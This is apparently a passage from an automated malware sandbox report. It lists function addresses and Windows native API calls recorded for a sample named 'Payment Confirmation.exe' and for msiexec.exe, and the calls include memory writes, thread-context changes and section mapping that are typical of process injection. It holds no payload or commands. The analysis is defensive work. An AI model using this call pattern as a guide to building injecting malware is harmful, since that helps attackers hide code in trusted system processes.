          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D24711_2_0046D247
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046D35211_2_0046D352
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CB6E11_2_0046CB6E
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CBE611_2_0046CBE6
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00458C4B11_2_00458C4B
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00458C9011_2_00458C90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0046CCB811_2_0046CCB8
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452D8911_2_00452D89
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452D9011_2_00452D90
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00452FB011_2_00452FB0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: String function: 044EB150 appears 32 times
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004185D0 NtCreateFile,4_2_004185D0
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00418680 NtReadFile,4_2_00418680
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_00418700 NtClose,4_2_00418700
          Source: C:\Users\user\Desktop\Payment Confirmation.exeCode function: 4_2_004187B0 NtAllocateVirtualMemory,4_2_004187B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529840 NtDelayExecution,LdrInitializeThunk,11_2_04529840
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529860 NtQuerySystemInformation,LdrInitializeThunk,11_2_04529860
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529540 NtReadFile,LdrInitializeThunk,11_2_04529540
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529910 NtAdjustPrivilegesToken,LdrInitializeThunk,11_2_04529910
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045295D0 NtClose,LdrInitializeThunk,11_2_045295D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045299A0 NtCreateSection,LdrInitializeThunk,11_2_045299A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A50 NtCreateFile,LdrInitializeThunk,11_2_04529A50
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045296D0 NtCreateKey,LdrInitializeThunk,11_2_045296D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045296E0 NtFreeVirtualMemory,LdrInitializeThunk,11_2_045296E0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529710 NtQueryInformationToken,LdrInitializeThunk,11_2_04529710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529FE0 NtCreateMutant,LdrInitializeThunk,11_2_04529FE0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529780 NtMapViewOfSection,LdrInitializeThunk,11_2_04529780
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452B040 NtSuspendThread,11_2_0452B040
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529820 NtEnumerateKey,11_2_04529820
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045298F0 NtReadVirtualMemory,11_2_045298F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045298A0 NtWriteVirtualMemory,11_2_045298A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529950 NtQueueApcThread,11_2_04529950
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529560 NtWriteFile,11_2_04529560
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452AD30 NtSetContextThread,11_2_0452AD30
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529520 NtWaitForSingleObject,11_2_04529520
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045299D0 NtCreateProcessEx,11_2_045299D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045295F0 NtQueryInformationFile,11_2_045295F0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529650 NtQueryValueKey,11_2_04529650
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529670 NtQueryInformationProcess,11_2_04529670
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529660 NtAllocateVirtualMemory,11_2_04529660
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529610 NtEnumerateValueKey,11_2_04529610
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A10 NtQuerySection,11_2_04529A10
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A00 NtProtectVirtualMemory,11_2_04529A00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A20 NtResumeThread,11_2_04529A20
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529A80 NtOpenDirectoryObject,11_2_04529A80
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529770 NtSetInformationFile,11_2_04529770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A770 NtOpenThread,11_2_0452A770
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529760 NtOpenProcess,11_2_04529760
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A710 NtOpenProcessToken,11_2_0452A710
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529B00 NtSetValueKey,11_2_04529B00
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_04529730 NtQueryVirtualMemory,11_2_04529730
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_0452A3B0 NtGetContextThread,11_2_0452A3B0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_045297A0 NtUnmapViewOfSection,11_2_045297A0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_004685D0 NtCreateFile,11_2_004685D0
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 11_2_00468680 NtReadFile,11_2_00468680
          Source: C:\Windows\SysWOW64\msiexec.exeCode function: 1